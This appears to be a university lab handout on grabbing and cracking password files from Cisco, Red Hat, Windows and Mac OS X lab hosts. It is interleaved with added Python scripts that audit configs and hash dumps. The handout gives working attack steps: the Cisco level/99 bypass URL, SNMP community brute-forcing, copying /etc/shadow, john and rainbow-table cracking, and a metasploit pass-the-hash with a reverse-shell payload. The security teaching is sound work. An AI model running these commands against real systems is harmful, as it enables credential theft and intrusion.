
Upload: duongdien

Post on 25-May-2018


CS3695/M6-109 Lab 05-NPS03 Password Cracking Ver. 8 Rev.8

Page #1

Password Cracking Lab

Lab Overview

The objective of this lab is to introduce you to grabbing and cracking password files from different OSes. You will be grabbing the files from a Windows 2000 host, a Red Hat host, a Macintosh OS X.7 host, and from a Cisco router. To obtain these files, we will use different methods of attack, from last lab's Alchemy Remote Executor, to simple ssh connections, to known exploits within the given operating systems. For this lab, it will be assumed you have already scanned and enumerated the network, and have decided to exploit the following four hosts for their password files:

OS                      IP Address
Cisco OS v12.0          10.10.10.2
Windows 2000            10.10.10.20, 10.10.10.53
Redhat Fedora Core 9    10.10.10.9
Macintosh OS X.2        10.10.10.107, 10.10.10.110

Note that the lines in yellow are questions to answer in the write-up…

Remote Connection

See the previous lab (01A-NPS00 Introduction to the Lab) and log onto your remote host.

Lab Procedures:

Cisco IOS v12.0 on 10.10.10.2:

Let's start with the Cisco router, because if we get the enable password, it may also be the administrator password on other systems. To get the password file from the Cisco router, we will use the old Cisco HTTP Configuration Arbitrary Administrative Access Vulnerability exploit to copy the config file to our local Windows box, then download the cracking program Cain & Abel to crack its MD5 hash for us.

Steps:

1. Log into the remote Windows VM.

2. Fire up the web browser and point it to the vulnerable router, 10.10.10.2, by entering the following URL into the address bar and hitting enter:

http://10.10.10.2/level/99/exec/show/config

You should now be presented with the startup configuration of the device (slightly different from the picture to the right…). If this fails, go to the next section on SNMP.


This was a very scary vulnerability discovered a few years ago and was viable against Cisco routers up to Ver 12.0 (and trust me, very few people update their Cisco routers very often; it is not like Windows or Mac, as there is no update client or notification of updates; you have to go purchase them from Cisco!). If a Cisco router had Version 12 or older and had its web server enabled for remote administration and configuration, it was vulnerable to this attack! As near as I can tell, this is an example of a programmer at Cisco installing a back door to bypass authentication requirements for ease of his/her use (I say this as there are only 15 levels of rights in a router, so using level 99 was not a normal command). Also know that you could run ANY config (or other Cisco) command on the router with this, not just show run.

Let's also grab the config file via another potential vulnerability in Cisco routers: SNMP (Simple Network Management Protocol). If SNMP is on, there is the possibility of reading the config file with just read permission. You will use the nmap scripting engine (NSE) and one of its scripts to do this. But before we can do even that, we need to find the community string (password) for the SNMP instance on the router. To do that we will also use the NSE, but with an online password cracker script.

3. On your Kali host, perform the online password attack with the following script (note it will be using its default password list, which should work just fine):

nmap -sU -p 161 --script=snmp-brute 10.10.10.2

{the -sU is for UDP, -p for port}

Note the Valid credentials community string for the next step (and yes, it's the default community string of public!)

4. Now to get the config file! Use the following NSE script command (NOTE this is all one continuous command, just keep typing till done):

nmap -sU -p 161 --script=snmp-ios-config --script-args snmpcommunitystring=public 10.10.10.2 -oN config

{-oN is the output file in normal (nmap) format} This should put a file in your directory called config; ls it to confirm it's there.

5. Now ensure your Windows SolarWinds TFTP server is running (see previous lab on how to do this) and tftp it to your Windows host. Use the following TWO commands:

tftp your_Windows_IP_address
put config


6. Back on your Windows host, ftp to ftp://ftpv8.hackers.net and get Cain & Abel at /CEHv8/Module 05 System Hacking/Password Cracking Tools/Cain & Able/ca_setup.exe.

7. Install Cain & Abel from the above file as administrator (.\admin).

a. Be sure to install WinPcap as well (it will prompt you to do so after installing Cain & Abel). If it tells you there is an older version already installed, accept the defaults to install this newer version.

b. Do NOT reboot if prompted to do so…

8. Start Cain with Admin (run as…). If it warns you the firewall is on, just click through it.

9. Once it starts, it will look like this:

10. There are two types of passwords in the config file:

Type 5 (MD5 Hash)… More Secure
Type 7 (XOR Hash)… Less Secure

11. You will now need to copy your encrypted passwords from the config web page or config.nmap file into Cain. Let's start with the easier Type 7 ones. There is a special cracker for these in Cain, under the top row icons.

a. Copy a Type 7 hash from the displayed config file into this tool (be sure to copy just the hash!).

b. Copy these passwords down for the lab write-up!


12. Now let's do the more advanced MD5 hash password. For this one we will use a “Dictionary Attack”, where we hash every word in a dictionary or word list and compare the results with the hash from the config file (of course we won't do this manually, we will let Cain do it for us ;-)

a. Click on Cain's “Cracker” tab, and then the Cisco IOS-MD5 Hash cracker:

b. Now right-click under the Hash pane, choose Add to List, and paste in the MD5 hash from the displayed config file in the web browser.

c. Now right-click on that hash and choose Dictionary Attack.

d. We now need to add in the dictionary that will be used. You could import one, but let's use the word list that comes with Cain. Right-click in the Dictionary pane and choose Add to list.

e. In the Cain folder, you will find a folder called Wordlists. Navigate into that folder and choose Wordlist.

f. To save us time, I am going to have you limit the options to just lower case passwords… This is just because I know the password is lower case (I know because I chose the password ;-). Normally you might choose more options that would more realistically test your possible password hashes…

g. Press the Start button and watch it do its thing!

h. If it gets into the “c” words, something went wrong (the password starts with “b”). My tests took less than a minute to run.


i. When it completes its run, it shows the password in this window pane, and if you close it, it also displays in the Hash pane…

j. Copy this password down for the lab write-up!
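The Cisco part of the lab works because of a handful of configuration weaknesses: Type 7 passwords (a reversible obfuscation), Type 5 MD5 hashes that a dictionary attack can reach, the HTTP server the level/99 request went through, and a default SNMP community string. As an added example (not part of the lab handout and not a Cisco or Cain tool), the following Python script audits an IOS configuration text for exactly those conditions, so an administrator can find them on a running config before anyone else does. The configuration fragment, its hash bodies and the function names are constructed for illustration.

```python
import re

# Constructed sample IOS configuration fragment; hash values are placeholders, not real hashes.
SAMPLE_CONFIG = """\
version 12.0
hostname lab-router
enable secret 5 $1$abcd$PLACEHOLDERmd5crypt0000000
enable password 7 0822455D0A16
username admin password 7 104D000A0618
username backup password 0 ClearTextPw
ip http server
snmp-server community public RO
snmp-server community s3cr3t-rw RW
line vty 0 4
 password 7 02050D480809
 login
"""


def audit_ios_config(config_text):
    """Return a list of (severity, line_number, message) findings for an IOS config."""
    findings = []
    for lineno, raw in enumerate(config_text.splitlines(), start=1):
        line = raw.strip()

        # Type 7 is a reversible obfuscation, not a hash; Cain and many other tools undo it instantly.
        if re.search(r"\bpassword 7 \S+", line):
            findings.append(("HIGH", lineno, "Type 7 (reversible) password: " + line))
        # Type 0 (or no type number at all) means the password sits in the config in clear text.
        elif re.search(r"\bpassword (0 )?\S+", line) and not re.search(r"\bpassword 5 ", line):
            findings.append(("HIGH", lineno, "Clear-text password: " + line))

        # 'enable password' is kept for old images; 'enable secret' (Type 5) should be used instead.
        if line.startswith("enable password"):
            findings.append(("MEDIUM", lineno, "'enable password' set; use 'enable secret' instead"))

        # Type 5 is MD5-crypt: salted, but fast enough for the dictionary attack the lab runs.
        if re.search(r"\b(secret|password) 5 \S+", line):
            findings.append(("LOW", lineno, "Type 5 (MD5) hash; needs a long, non-dictionary password"))

        # The HTTP admin interface is where the level/99 authentication bypass was reachable.
        if line == "ip http server":
            findings.append(("HIGH", lineno, "ip http server enabled; disable it or restrict it with an ACL"))

        # SNMP: a default community name or RW access both hand over the configuration.
        m = re.match(r"snmp-server community (\S+)(?: (RO|RW))?", line)
        if m:
            community, mode = m.group(1), m.group(2) or "RO"
            if community.lower() in ("public", "private"):
                findings.append(("HIGH", lineno, "Default SNMP community '%s'" % community))
            if mode == "RW":
                findings.append(("HIGH", lineno, "SNMP community '%s' is RW" % community))
    return findings


def severity_counts(findings):
    """Tally findings by severity, e.g. {'HIGH': 7, 'MEDIUM': 1, 'LOW': 1}."""
    counts = {}
    for severity, _, _ in findings:
        counts[severity] = counts.get(severity, 0) + 1
    return counts


if __name__ == "__main__":
    for severity, lineno, message in audit_ios_config(SAMPLE_CONFIG):
        print("%-6s line %2d: %s" % (severity, lineno, message))
    print(severity_counts(audit_ios_config(SAMPLE_CONFIG)))
```

Run against a saved `show running-config`, every HIGH line is something the lab exploited directly: the Type 7 strings Cain reverses, the open HTTP server, and the `public` community that `snmp-brute` guessed first. The fix on each is the same as the lesson: `enable secret` instead of `enable password`, `no ip http server` (or an ACL on it), and a non-default read-only community restricted to the management network.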


RedHat (10.10.10.9):

To get the password file for this host, we will ssh to it using the root account. Since we have a user account/password combination from the Cisco router that we discovered earlier in the lab, we will try that as the root password. We will need to log on as root on the targeted Linux host, since only root (or a service or process running as root) has the privilege to see the shadow file. We will read the passwd and shadow files, copying them to a local text file, save them, and run john against them once we have unshadowed them (combined them into one file for john to crack)… Steps:

1. ssh or VNC onto your Kali VM image, being sure to be running on a command line as root before continuing (you should be able to do this at this point in the quarter).

2. From within that command line within Kali, we are going to copy the passwd and shadow files off of novalis-fc9.target.com (10.10.10.9) for cracking.

a. cd into the pwd2crack directory you just made.

b. man scp to read what it does (q to exit).

c. scp root@10.10.10.9:/etc/passwd .

{NOTE: there are no spaces between 9: and /etc, and there is a space between passwd and the “.” [that period tells scp to put the file in your pwd]}

i. Accept any keys it may offer (only happens to the first one to do this).

ii. Use the Type 5 password from Cain you cracked earlier.

d. scp root@10.10.10.9:/etc/shadow .

e. cat both files to be sure they arrived without any problems.

3. Now combine the files with john and crack them from within the command line you are on:

a. unshadow passwd shadow > hashfile

b. cat hashfile to ensure it worked (it should be one file with the last few accounts having hashes in them).

c. john hashfile

To get the status of where john is in cracking, hit the space bar…

4. Within 5 minutes, you should have the password and (account) for the ones john will crack quickly (it should have cracked Bane, switch and smith's accounts, along with some of the easier ones with passwords like Password1 and test)… Use <cntrl-c> to break out of john.

5. Run a quick john hashfile --show to see the accounts and passwords that john cracked. Write down the passwords and accounts for the lab write-up. {Note we could let this run for weeks, but since we have what we need for now we ended it and move on… <cntrl>-c to end}

a. john hashfile --show

b. Note that this one is in the format of

useracct:passwd:uid:groupid:longname:homedir:shell_pref


Windows 2000 (gnosis-win2000.target.com):

We have the password SAM file from this Windows host from our previous lab, where we ran Alchemy Remote Executor with admin privileges to obtain the SAM file with pwdump3. Now we have to crack it. We could use john like we did with the previous Linux box, but let's try a new tool (see the lab manual Lab 05-01 LCP for additional information). Once we see how LCP runs, I will then have you transfer your SAM file over to another host running rainbow tables so we can crack all the accounts quickly (less than 5 minutes to crack ALL the LANMAN hashes!) Steps:

1. In your remote Windows 7 host, open a Command Shell (DOS Prompt) and change directory to your desktop (or a lab folder if you are using them).

2. ftp to ftp://ftpv8.hackers.net and get LCP from /CEHv8/CEHv8 Module 5 System Hacking/ Password Cracking Tools/ LCP lcp504en.exe.

3. Now unzip it and install it with “run as” Administrator.

4. Once installed, start LCP5 up (manually find it under C:\Program Files (x86)\LCP), run as administrator.

5. You will need to import the pwdump file from the last lab to crack it. Ensure to have it look for all files to find yours (it should be in your D:\tftp-root\ folder):

6. Let it run (by clicking the play button) for about 2 minutes or until it goes into “Brute Force” mode, as you will have cracked all you can for now. You should have 6 passwords (for apoc, Dozwer, Morpheus, mouse, sati, tank). Write these down for the lab write-up.


Rainbow Tables

You will now ssh onto a host that has rainbow tables on it and crack all the LANMAN hashes with the rainbow tables.

7. We will need to find a way to get our SAM file to the host that has the rainbow tables for cracking, so now is a good time to start your tftp server (SolarWinds) and ensure your pwdump file is in it (D:\tftp-root\ folder for transfer, if it is not already there) (see previous labs if you don't remember how to use tftp). So you will need to:

a. Start the SolarWinds tftp server and ensure the configuration is correct (TFTP Root Directory set to D:\tftp-root\ and security set to transmit and receive).

b. From within your Kali host, open a shell and ssh over to rainbow.hackers.net: ssh [email protected] (accept any keys it offers, password Password1)

c. Once there, cd to /rainbow/lm_full/

d. tftp your pwdump file to this directory (use tftp and get; see previous labs if you don't remember how). Be sure to get the original file, NOT the one that ends in lcp (may be there from the LCP5 crack we just did ;-)

tftp your_ip_address -c get filename

e. To see the commands for the crack program, run ./rcrack with no arguments:

./rcrack

f. Now run ./rcrack on your file:

./rcrack *.rt -f <your sam file>

{May appear to hang for the first 5 mins, LET IT RUN (move onto the Mac section below)! Should take less than 10 mins to run the entire file; mine took a little over 6 mins to complete} (you may want to have the output go to a file by using >> outputfilename at the end of the previous command and then tftp it back to your host)

g. Write these cracked passwords down for the lab write-up.

** NOTES:

1) As this is being run on a VM, be patient!! If more than one team is cracking at the same time, speed and execution time may vary.

2) When it's complete, the end of the run shows the list of hashes and the users/passwords.

3) If you exit out of the ssh session (from your Kali host to rainbow.hackers.net) while it is still running, it will kill the job. BUT if you remain logged in to your Kali host (and therefore the rainbow.hackers.net host), but DISCONNECT from either the VNC connection (if you got onto the Kali host that way) or the View session (just quit your RDP/PCOIP session), it should continue to run in the background until you return and log back into csview.nps.edu and/or your Kali remote host via VNC from within your remote Windows 7 host.


Pass-the-Hash & Windows Server 2003 (10.10.10.53)

You will now take the hash file and tftp it onto your Kali host and look for the account Hamann. Looking at this file (use more or less), you should note that account Hamann has no LanMan hash but does have an NTLM hash (meaning we cannot crack his password with the rainbow table, but we can use the hash in another way). You will copy his NTLM hash and use metasploit's pass-the-hash ability to use that hash of the password instead of the password itself to log onto a computer Hamann has an account on.

8. From within Kali, open a terminal/shell and, just like in the previous step, grab a copy of the SAM file:

tftp your_ip_address get SAMfilename

9. Look at the contents of the SAM file to be sure everything is there.

10. You need the one account that doesn't have a LanMan hash but does have an NTLM hash (hint: it's Hamann).

11. We have been told that Councilor Hamann has access to a shared folder only he can access! It's Keys2Mainframe on 10.10.10.53. Since we cannot just map a drive for him (we don't have his password), we will have to use metasploit's ability to pass-the-hash! Start metasploit and enter in the following settings:

a. msfconsole
b. use exploit/windows/smb/psexec
c. set RHOST 10.10.10.53
d. set SHARE Keys2Mainframe
e. set SMBUser Hamann
f. set SMBPass type-in-32-zeros-then-paste-in-Hamann's-hash
g. set PAYLOAD windows/meterpreter/reverse_tcp
h. set LHOST your-IP-address

SEE SCREEN CAPTURE NEXT PAGE to confirm your settings


12. show options should look something like this:

13. Now run it with exploit and it should give you a meterpreter prompt!

14. Here we can get a shell and go look for the keys! Include the keys in your write-up! {Note: I was able to pass-the-hash to Windows XP, 7, 8 and 2008 Svr with success on the hash, but the payload fails}

Your IP should be different

Notice we have authenticated with the HASH, not the password!
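The rainbow-table and pass-the-hash sections hinge on a distinction visible in the dumped SAM data: accounts with a stored LanMan hash fall to the LM tables in minutes, while Hamann has only an NT hash. As an added example (not from the lab handout, pwdump or metasploit), this Python script parses pwdump-style lines and reports, per account, whether an LM hash is stored, whether the password is blank, and whether the LM second half shows a password of 7 or fewer characters; an administrator can run it on a dump from their own systems to find what to fix. The sample lines and hash values are constructed placeholders (only the two empty-string hash constants are the real well-known values), and the function names are my own.

```python
# LM hash of the empty string: also what pwdump shows when no LM hash is stored at all.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string: an account with a blank password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hashes the password as two 7-character halves; an empty second half means <= 7 characters.
EMPTY_LM_HALF = "aad3b435b51404ee"

# Constructed pwdump-style sample (user:RID:LM hash:NT hash:::). Hash values are placeholders
# except the empty-string constants above; no real account is represented.
SAMPLE_PWDUMP = """\
Administrator:500:1a2b3c4d5e6f7081aad3b435b51404ee:9f8e7d6c5b4a39281f0e1d2c3b4a5968:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Hamann:1001:aad3b435b51404eeaad3b435b51404ee:c0ffee00c0ffee00c0ffee00c0ffee00:::
tank:1002:0011223344556677889900aabbccddee:ffeeddccbbaa00998877665544332211:::
"""


def parse_pwdump(text):
    """Parse pwdump lines into dicts; skips blank and comment lines, rejects malformed ones."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4 or len(parts[2]) != 32 or len(parts[3]) != 32:
            raise ValueError("malformed pwdump line: %r" % line)
        records.append({
            "user": parts[0],
            "rid": int(parts[1]),
            "lm": parts[2].lower(),
            "nt": parts[3].lower(),
        })
    return records


def classify(record):
    """Label one account by what its stored hashes expose."""
    lm_stored = record["lm"] != EMPTY_LM
    if record["nt"] == EMPTY_NT and not lm_stored:
        return "empty-password"   # blank password: no cracking needed at all
    if lm_stored:
        return "lm-stored"        # case-folded, <= 14 chars: rainbow-table territory
    return "nt-only"              # the Hamann case: not in the LM tables, but still replayable


def lm_password_at_most_7(record):
    """True when the LM second half is the empty-half constant, i.e. the password is <= 7 chars."""
    return record["lm"] != EMPTY_LM and record["lm"][16:] == EMPTY_LM_HALF


def audit_pwdump(text):
    """Return ({user: label}, users still storing LM hashes, users whose LM hash shows <= 7 chars)."""
    records = parse_pwdump(text)
    labels = {r["user"]: classify(r) for r in records}
    lm_users = [r["user"] for r in records if classify(r) == "lm-stored"]
    short = [r["user"] for r in records if lm_password_at_most_7(r)]
    return labels, lm_users, short


if __name__ == "__main__":
    labels, lm_users, short = audit_pwdump(SAMPLE_PWDUMP)
    for user, label in labels.items():
        print("%-14s %s" % (user, label))
    print("LM hash still stored:", lm_users)
    print("LM shows <= 7 char password:", short)
```

Every `lm-stored` account is one the rainbow tables above would have recovered; on Windows the LM hash stops being stored once the NoLMHash policy is on or the password is longer than 14 characters, and the field then shows the empty-hash value seen for Hamann after the next password change. Note what the `nt-only` label does not mean: as step 14 shows, the NT hash alone is enough for pass-the-hash, so removing LM hashes prevents the cracking but not the replay; that part needs the hash store itself protected and local administrator credentials not shared across machines.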


Mac OS X.7 (10.10.10.107)

To get the password file for this host, we will ssh to it using one of the accounts discovered from the Windows box above (admin/Password1). Here the account will not be root, but an administrator on the Mac. Then we will run a program I loaded to it called Dave to crack one of them on the Mac (Neo's password on this host). This will, like most of the other cracks in this lab, be a dictionary attack against the hash. Steps using Dave:

1. ssh to 10.10.10.107 from within the Kali remote host: ssh admin@10.10.10.107 {note: may take a few seconds to connect}

a. Accept any keys it may offer (only happens to the first one to do this).

b. Use the password from the Windows password crack for admin from the rainbow tables in the last step (Password1).

2. Dave can only crack or dump one user at a time, so you will need to find the user names on the Mac. To do this I recommend just looking in the /Users/ folder (each user is given their own home directory ;-). You could do this with more complicated commands like dscl, but for now this is a fine method: ls /Users/

a. Now write down the accounts on this Mac for the lab write-up.

3. cd into /Users/Admin/Downloads/DavidGrohl/

4. Let's run dave against the neo account:

sudo ./dave -u neo

{Supply admin's password (Password1) when prompted for it} {This should crack in about 30 seconds}

a. Now write down the password for the lab write-up.

5. Exit out of the ssh session: exit


Mac OS X.2 (10.10.10.110)

To get the password file for this host, we will ssh to it using one of the accounts discovered from the Windows box above (sati). Here the account will not be root; on the Mac, version 10.2 and the 10.3 upgrade, there is a vulnerability where any user can still see the password file with the hashes using the nidump command. Then we will copy that file to a local text file, save it, and run john against it (we will not have to unshadow this file since the accounts and hashes are already combined by nidump)… Steps:

6. ssh to 10.10.10.110 from within the Kali remote host: ssh sati@10.10.10.110 {note: may take a few seconds to connect}

a. Accept any keys it may offer (only happens to the first one to do this).

b. Use the password from the Windows password crack from the rainbow tables in the last step.

7. View and copy the password file (this one has both the user and the password hashes):

nidump passwd /

a. Now select the contents of the file by highlighting them in the shell and copying them (be sure to only get the contents, not any of the command prompt lines).

b. Open the text editor on your Kali host (top left corner of the Kali screen: Applications menu -> Accessories -> leafpad Text Editor) and paste the contents into it, then save the file as macpasswd.

8. Exit out of your ssh session with the remote host 10.10.10.110: exit

9. Now from within a root Kali shell, cd into the directory where you saved the above file.

10. Now run john against the macpasswd file: john macpasswd

11. Within a minute, you will have the password and (accounts) for the ones john will crack fairly quickly (it should have cracked 5 of the 6 right off the bat); if you let it run for about 5 minutes it will find the last one for sati.

12. Stop the john run with a cntrl-c if you don't want to wait the 5 minutes.

13. You can also see them by using john's show command once john has ended:

john --show macpasswd

a. Note that this one is in the format of

useracct:passwd:uid:groupid:longname:homedir:shell_pref

b. Now write down the password for the lab write-up.
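Both the RedHat steps and the Mac OS X.2 steps above end with a file in the user:hash:uid:gid:name:home:shell layout just shown. As an added example (not part of the lab and not john's code), the Python below parses such an unshadowed file and classifies each account's password field by scheme, so a defender reviewing their own hosts can see which accounts are locked, which have no password at all, and which use a fast scheme (traditional DES crypt or MD5-crypt, the latter being the same algorithm as the Cisco Type 5 hash) that john gets through in minutes as the lab shows. The sample lines are constructed, the hash bodies are placeholders, and the function names are assumptions.

```python
import re

# Constructed sample in the user:hash:uid:gid:name:home:shell layout above. Hash bodies are
# placeholder strings of the right shape, not hashes of any real password.
SAMPLE_HASHFILE = """\
root:$6$saltsalt$PLACEHOLDERsha512cryptbody:0:0:root:/root:/bin/bash
bane:$1$abcdefgh$PLACEHOLDERmd5body:500:500:Bane:/home/bane:/bin/bash
switch:ab/CDEFGHIJK1:501:501:Switch:/home/switch:/bin/bash
smith:*:502:502:Agent Smith:/home/smith:/sbin/nologin
test::503:503:Test account:/home/test:/bin/bash
daemon:!!:2:2:daemon:/sbin:/sbin/nologin
"""

# Schemes john gets through quickly: no hash at all, or an old fast design.
FAST_SCHEMES = {"empty", "des-crypt", "md5-crypt"}


def hash_scheme(field):
    """Name the crypt scheme of one password field by its prefix / shape."""
    if field == "":
        return "empty"                  # no password: login succeeds with nothing
    if field[0] in "!*":
        return "locked"                 # '*', '!' or '!!': password login disabled
    if field.startswith("$6$"):
        return "sha512-crypt"
    if field.startswith("$5$"):
        return "sha256-crypt"
    if field.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if field.startswith("$1$"):
        return "md5-crypt"              # the scheme behind Cisco 'Type 5' as well
    if re.fullmatch(r"[A-Za-z0-9./]{13}", field):
        return "des-crypt"              # traditional 13-char crypt(3): 8-character limit
    return "unknown"


def parse_hashfile(text):
    """Parse unshadow-style lines; lines with fewer than 7 fields (e.g. john's summary line) are skipped."""
    accounts = []
    for raw in text.splitlines():
        parts = raw.rstrip("\n").split(":")
        if len(parts) < 7:
            continue
        accounts.append({
            "user": parts[0],
            "hash": parts[1],
            "uid": int(parts[2]),
            "gid": int(parts[3]),
            "name": parts[4],
            "home": parts[5],
            "shell": parts[6],
        })
    return accounts


def audit_hashfile(text):
    """Return [(user, scheme, weak)] where weak marks the accounts to fix first."""
    report = []
    for acct in parse_hashfile(text):
        scheme = hash_scheme(acct["hash"])
        report.append((acct["user"], scheme, scheme in FAST_SCHEMES))
    return report


def weak_users(text):
    """Just the user names flagged weak by audit_hashfile."""
    return [user for user, _, weak in audit_hashfile(text) if weak]


if __name__ == "__main__":
    for user, scheme, weak in audit_hashfile(SAMPLE_HASHFILE):
        print("%-8s %-13s %s" % (user, scheme, "FIX" if weak else "ok"))
```

The point of the classification is the order in which the lab's john runs succeed: an empty field needs no cracking, DES crypt caps passwords at 8 characters and is unsalted beyond 12 bits, and MD5-crypt is salted but cheap, which is why "Password1" and "test" fall within the first minutes. Accounts in the first two groups should be locked or re-hashed under sha512-crypt (or bcrypt) on the next password change; the only real defence for the remaining hashes is keeping the shadow file root-only, exactly the restriction the Mac OS X.2 nidump bug removed.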

Clean up

Exit out of all your ssh sessions, close all windows, and disconnect.

I hope you enjoyed this lab… Feel free to let me know how to improve it in the write-up. Please post just showing the IP addresses, user accounts and some of the passwords you crack (you do NOT have to crack all of them) via the Sakai Assignments page!